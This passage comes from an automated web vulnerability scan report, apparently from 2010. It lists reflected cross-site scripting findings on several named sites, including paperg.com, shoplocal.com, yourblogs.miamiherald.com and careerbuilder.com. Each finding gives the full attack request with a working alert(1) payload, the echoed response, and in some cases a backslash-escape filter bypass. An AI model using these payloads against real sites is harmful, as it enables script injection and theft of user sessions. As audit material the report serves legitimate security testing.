Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /view_photo.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d36a"><script>alert(1)</script>8c772da80c8 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /view_photo.php?c=805&photo=1162&t=home3d36a"><script>alert(1)</script>8c772da80c8&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:47 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:47 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=25c766b0eb9141346ab0bc08977004e4; expires=Mon, 14-Nov-2011 22:54:47 GMT; path=/; domain=momsmiami.com; HttpOnly
Content-Length: 4468
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<a href="/view_photo.php?c=805&amp;photo=1163&amp;t=home3d36a"><script>alert(1)</script>8c772da80c8">
...[SNIP]...

2.241. http://www.paperg.com/jsfb/embed.php [514e9 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the 514e9 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d23b'-alert(1)-'2f0a88819c9 was submitted in the 514e9 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9 HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=tgkar1ao449m0cf8fnr8i5oqb2;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:44:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 38483

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

2.242. http://www.paperg.com/jsfb/embed.php [514e9'-alert(1)-'c9c3e793f35 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the 514e9'-alert(1)-'c9c3e793f35 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b45a5'-alert(1)-'33bc75a77ed was submitted in the 514e9'-alert(1)-'c9c3e793f35 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1b45a5'-alert(1)-'33bc75a77ed HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.paperg.com

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:50:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=dhp92f9l0lis55cnv8040gis54; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 38508

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1b45a5'-alert(1)-'33bc75a77ed';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

2.243. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18be1%3balert(1)//7595c8d1dbb was submitted in the bid parameter. This input was echoed as 18be1;alert(1)//7595c8d1dbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=226718be1%3balert(1)//7595c8d1dbb HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=fvoptsd42e3hkt4pfm52800q90; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37192

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL226718be1;alert(1)//7595c8d1dbb = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=226718be1%3balert(1)//7595c8d1dbb';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');
...[SNIP]...

2.244. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a1d'-alert(1)-'544a3639a3c was submitted in the bid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267b6a1d'-alert(1)-'544a3639a3c HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=6nns86ujkiu8g4lg0obo4apq44; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 38534

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267b6a1d'-alert(1)-'544a3639a3c = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267b6a1d'-alert(1)-'544a3639a3c';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

2.245. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 514e9'-alert(1)-'c9c3e793f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1 HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=77ha5ca3vhecpt0dpk8kk1eml1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 38481

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...

2.246. http://www.paperg.com/jsfb/embed.php [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4e3'-alert(1)-'ba6e9cc672 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=43501a4e3'-alert(1)-'ba6e9cc672&bid=2267 HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=2dal9ah2n2uu01h72vg85q5hk3; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37701

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=43501a4e3'-alert(1)-'ba6e9cc672&bid=2267';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length
...[SNIP]...

2.247. http://www.rentalhomesplus.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rentalhomesplus.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fff53"-alert(1)-"c1b63fc5c18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fff53"-alert(1)-"c1b63fc5c18=1 HTTP/1.1
Host: www.rentalhomesplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|100@UserSiteType|RHP@BaseURL|www@SiteId|2@BetaNumber|138@RedirectURL|http://www.rentalhomesplus.com@; domain=.rentalhomesplus.com; expires=Sun, 14-Oct-2012 22:44:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rpx2o1e0bc3mnkf14ernsn55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:44:47 GMT
Connection: close
Content-Length: 62104
Set-Cookie: aptspersistence=612439212.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<!--BEGIN
...[SNIP]...
<!-- Shared -->    
var regionName = "";
var areaName = "";
var subareaName = "";
var PropType = "";
var siteName    = "RHP";
var friendlyURL = "/?fff53"-alert(1)-"c1b63fc5c18=1";
var friendlyURLSearch = friendlyURL.search("for-rent");

if(pageCheck == "avsummary")
   {
if(PropType == "3" || siteName == "RHP")
{
var avSummary
...[SNIP]...

2.248. http://www.shoplocal.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shoplocal.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4390'-alert(1)-'aca305d9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e4390'-alert(1)-'aca305d9be=1 HTTP/1.1
Host: www.shoplocal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uioo4y55ykop5355roagiprp; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Wed, 14-Nov-2035 23:45:10 GMT; path=/
Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:45:09 GMT
Connection: close
Content-Length: 56291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<
...[SNIP]...
<script language="javascript">
var pt = new Image();
pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?e4390'-alert(1)-'aca305d9be=1&action=home&viewmode=local&referrer=&random=897241575&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script>
...[SNIP]...

2.249. http://www.sportsnetwork.com/aspdata/clients/sportsnetwork/RealScoresClientLive.aspx [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /aspdata/clients/sportsnetwork/RealScoresClientLive.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1853c"style%3d"x%3aexpression(alert(1))"40924e9e725 was submitted in the client parameter. This input was echoed as 1853c"style="x:expression(alert(1))"40924e9e725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /aspdata/clients/sportsnetwork/RealScoresClientLive.aspx?client=miami21853c"style%3d"x%3aexpression(alert(1))"40924e9e725 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.miamiherald.com/sports/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.sportsnetwork.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 14 Nov 2010 22:23:33 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=60
Expires: Sun, 14 Nov 2010 22:24:33 GMT
Last-Modified: Sun, 14 Nov 2010 22:23:33 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 7125

<head><link href="http://www.sportsnetwork.com/aspdata/clients/miami21853c"style="x:expression(alert(1))"40924e9e725/RealTab.css" rel="stylesheet" type="text/css" /><style><!--.tab{color: #000000;font
...[SNIP]...

2.250. http://yourblogs.miamiherald.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yourblogs.miamiherald.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2473"><script>alert(1)</script>d18d2a8007 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b2473"><script>alert(1)</script>d18d2a8007=1 HTTP/1.1
Host: yourblogs.miamiherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:53:43 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
ETag: d04fd3aaf6ab2773e6e35b65c34361f5
X-RSS-CACHE-STATUS: MISS
Last-Modified: Sun, 14 Nov 2010 21:45:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109951

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Community Blog Network</title>

<link rel="shortcut icon" href="htt
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://yourblogs.miamiherald.com/index.php?b2473"><script>alert(1)</script>d18d2a8007=1&amp;media=rss" />
...[SNIP]...

2.251. http://accounting.careerbuilder.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5fd\'%3balert(1)//663d5006bad was submitted in the Referer HTTP header. This input was echoed as 9d5fd\\';alert(1)//663d5006bad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=9d5fd\'%3balert(1)//663d5006bad

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199301
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:35:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Accoun
...[SNIP]...
';
s_cb.channel='JS_FindJobs';
s_cb.prop1='AG Subdomain Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9d5fd\\';alert(1)//663d5006bad';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.252. http://accounting.careerbuilder.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f6fc\'%3balert(1)//8602fe1ed7 was submitted in the Referer HTTP header. This input was echoed as 9f6fc\\';alert(1)//8602fe1ed7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=9f6fc\'%3balert(1)//8602fe1ed7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199290
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:23:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Accoun
...[SNIP]...
';
s_cb.channel='JS_FindJobs';
s_cb.prop1='AG Subdomain Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9f6fc\\';alert(1)//8602fe1ed7';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.253. http://accounting.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /JobSeeker/Jobs/JobResults.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 114ab\'%3balert(1)//117bf833582 was submitted in the Referer HTTP header. This input was echoed as 114ab\\';alert(1)//117bf833582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

